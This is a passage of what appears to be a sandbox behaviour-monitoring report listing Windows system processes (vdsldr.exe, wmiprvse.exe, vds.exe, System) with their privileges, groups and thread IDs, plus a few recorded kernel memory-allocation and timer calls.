	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 110
	os_tid = 0x2a8


Thread:
	id = 111
	os_tid = 0x7a0


Thread:
	id = 112
	os_tid = 0x3b0


Thread:
	id = 113
	os_tid = 0x3c0


Thread:
	id = 114
	os_tid = 0x204


Thread:
	id = 115
	os_tid = 0x5d8


Thread:
	id = 116
	os_tid = 0x588


Thread:
	id = 117
	os_tid = 0x7c4


Thread:
	id = 172
	os_tid = 0x85c


Thread:
	id = 175
	os_tid = 0x114


Process:
	id = "20"
	image_name = "vdsldr.exe"
	filename = "c:\\windows\\system32\\vdsldr.exe"
	page_root = "0x4f814000"
	os_pid = "0xa80"
	os_integrity_level = "0x4000"
	os_privileges = "0x20860100"
	monitor_reason = "rpc_server"
	parent_id = "15"
	os_parent_pid = "0xa28"
	cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00050fbc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 120
	os_tid = 0xab8


Thread:
	id = 121
	os_tid = 0xab4


Thread:
	id = 122
	os_tid = 0xab0


Thread:
	id = 123
	os_tid = 0xa90


Thread:
	id = 124
	os_tid = 0xa8c


Thread:
	id = 125
	os_tid = 0xa84


Process:
	id = "21"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x4ea19000"
	os_pid = "0xad4"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "17"
	os_parent_pid = "0x36c"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000522eb" [0xc000000f]


Thread:
	id = 126
	os_tid = 0xad8


Thread:
	id = 127
	os_tid = 0xae0


Thread:
	id = 128
	os_tid = 0xae8


Thread:
	id = 129
	os_tid = 0xaec


Thread:
	id = 134
	os_tid = 0xb88


Thread:
	id = 135
	os_tid = 0xb8c


Thread:
	id = 136
	os_tid = 0xb94


Thread:
	id = 150
	os_tid = 0xbd8


Thread:
	id = 171
	os_tid = 0x860


Process:
	id = "22"
	image_name = "vds.exe"
	filename = "c:\\windows\\system32\\vds.exe"
	page_root = "0x4d76c000"
	os_pid = "0xacc"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "20"
	os_parent_pid = "0xa80"
	cmd_line = "C:\\Windows\\System32\\vds.exe"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005238b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 139
	os_tid = 0xbb8


Thread:
	id = 140
	os_tid = 0xbb0


Thread:
	id = 141
	os_tid = 0xaf4


Thread:
	id = 142
	os_tid = 0xaf0


Thread:
	id = 143
	os_tid = 0xae4


Thread:
	id = 144
	os_tid = 0xad0


Thread:
	id = 145
	os_tid = 0xbbc


Thread:
	id = 146
	os_tid = 0xbc4


Thread:
	id = 147
	os_tid = 0xbc8


Thread:
	id = 149
	os_tid = 0xbd4


Thread:
	id = 152
	os_tid = 0xbe4


Thread:
	id = 153
	os_tid = 0xbf0


Thread:
	id = 154
	os_tid = 0xbf4


Thread:
	id = 155
	os_tid = 0xbf8


Thread:
	id = 156
	os_tid = 0xbfc


Thread:
	id = 158
	os_tid = 0x30c


Thread:
	id = 159
	os_tid = 0x850


Thread:
	id = 164
	os_tid = 0x87c


Process:
	id = "23"
	image_name = "System"
	filename = ""
	page_root = "0x187000"
	os_pid = "0x4"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "kernel_analysis"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = ""
	cur_dir = ""
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7]


Thread:
	id = 176
	os_tid = 0x8


Thread:
	id = 177
	os_tid = 0xc0


Thread:
	id = 178
	os_tid = 0x44


Thread:
	id = 179
	os_tid = 0x24


Thread:
	id = 180
	os_tid = 0x30

	[0262.738] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1d299, Tag=0x6944624f) returned 0xfffffa8001a0e000
	[0271.235] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1ceca, Tag=0x63426343) returned 0xfffffa8001a2c000
	[0271.236] KeSetTimer (in: Timer=0xfffffa80018eef67, DueTime=0xffffffffb69d2bf6, Dpc=0xfffffa80018eefa7 | out: Timer=0xfffffa80018eef67) returned 0

Thread:
	id = 181
	os_tid = 0x40


Thread:
	id = 182
	os_tid = 0x38


Thread:
	id = 183
	os_tid = 0x9c


Thread:
	id = 184
	os_tid = 0x5c


Thread:
	id = 185
	os_tid = 0x34


Thread:
	id = 186
	os_tid = 0xc4


Thread:
	id = 187
	os_tid = 0xcc


Thread:
	id = 188
	os_tid = 0xd0


Thread:
	id = 189
	os_tid = 0xb8


Thread:
	id = 190
	os_tid = 0xd4


Thread:
	id = 191
	os_tid = 0xd8


Thread:
	id = 192
	os_tid = 0xdc


Thread:
	id = 193
	os_tid = 0xe8


Thread:
	id = 194
	os_tid = 0xec


Thread:
	id = 195
	os_tid = 0x48


Thread:
	id = 196
	os_tid = 0x64


Thread:
	id = 197
	os_tid = 0x2c


Thread:
	id = 198
	os_tid = 0xfc


Thread:
	id = 199
	os_tid = 0x100


Thread:
	id = 200
	os_tid = 0x10c


Thread:
	id = 201
	os_tid = 0x104


Thread:
	id = 202
	os_tid = 0x108


Thread:
	id = 203
	os_tid = 0x110


Thread:
	id = 204
	os_tid = 0x80


Thread:
	id = 205
	os_tid = 0x88


Thread:
	id = 206
	os_tid = 0x98


Thread:
	id = 207
	os_tid = 0x8c


Thread:
	id = 208
	os_tid = 0x4c


Thread:
	id = 209
	os_tid = 0xb4


Thread:
	id = 210
	os_tid = 0x12c


Thread:
	id = 211
	os_tid = 0x130


Thread:
	id = 212
	os_tid = 0x134


Thread:
	id = 213
	os_tid = 0x138


Thread:
	id = 214
	os_tid = 0x78


Thread:
	id = 215
	os_tid = 0x174


Thread:
	id = 216
	os_tid = 0x90


Thread:
	id = 217
	os_tid = 0xb0


Thread:
	id = 218
	os_tid = 0x68


Thread:
	id = 219
	os_tid = 0x74


Thread:
	id = 220
	os_tid = 0x26c


Thread:
	id = 221
	os_tid = 0x28


Thread:
	id = 222
	os_tid = 0x2dc


Thread:
	id = 223
	os_tid = 0x3b0


Thread:
	id = 224
	os_tid = 0x2dc


Thread:
	id = 225
	os_tid = 0x114


Thread:
	id = 226
	os_tid = 0x94


Thread:
	id = 227
	os_tid = 0x84


Thread:
	id = 228
	os_tid = 0x4e0


Thread:
	id = 229
	os_tid = 0x5b0


Thread:
	id = 230
	os_tid = 0x5d4


Thread:
	id = 231
	os_tid = 0x600


Thread:
	id = 232
	os_tid = 0x604


Thread:
	id = 233
	os_tid = 0x670


Thread:
	id = 234
	os_tid = 0x6a4


Thread:
	id = 235
	os_tid = 0x6b0


Thread:
	id = 236
	os_tid = 0x6c0


Thread:
	id = 237
	os_tid = 0x6c8


Thread:
	id = 238
	os_tid = 0x6d4


Thread:
	id = 239
	os_tid = 0x6e0


Thread:
	id = 240
	os_tid = 0x60


Thread:
	id = 241
	os_tid = 0x20


Thread:
	id = 242
	os_tid = 0x768


Thread:
	id = 243
	os_tid = 0x50


Thread:
	id = 244
	os_tid = 0x4e8


Thread:
	id = 245
	os_tid = 0x4e4


Thread:
	id = 246
	os_tid = 0x3ac


Thread:
	id = 247
	os_tid = 0x4a8


Thread:
	id = 248
	os_tid = 0x0


Thread:
	id = 249
	os_tid = 0x30c


Thread:
	id = 250
	os_tid = 0xa0


Thread:
	id = 251
	os_tid = 0xbc


Thread:
	id = 252
	os_tid = 0x2ec